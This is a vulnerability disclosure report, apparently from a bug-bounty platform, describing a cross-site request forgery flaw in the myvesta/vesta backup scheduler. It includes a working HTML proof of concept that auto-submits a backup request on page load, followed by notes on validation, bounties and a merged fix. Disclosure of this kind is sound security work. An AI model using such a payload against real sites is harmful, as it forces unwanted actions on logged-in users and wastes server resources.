Cross-Site Request Forgery (CSRF) in myvesta/vesta

Valid

Reported on

Aug 24th 2021


✍️ Description

In this application there is weak CSRF protection on backup functionality. therefore according to below POC.html when a logged in user visits attacker website then an unintentional backup request sends to application.

🕵️‍♂️ Proof of Concept

//PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.myvesta.com/schedule/backup/">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

💥 Impact

This vulnerability is capable of forging admin or user to an unintentional backup that can cause using server resource and Disc filling.

💥 Test

Tested on Edge, Firefox, chrome and safari. 📍 Location index.php#L1 📝 References csrf

Occurences

References

We have contacted a member of the myvesta/vesta team and are waiting to hear back 3 months ago
Musio modified their report
3 months ago
myvesta validated this vulnerability 3 months ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
myvesta confirmed that a fix has been merged on 11f1cf 3 months ago
myvesta has been awarded the fix bounty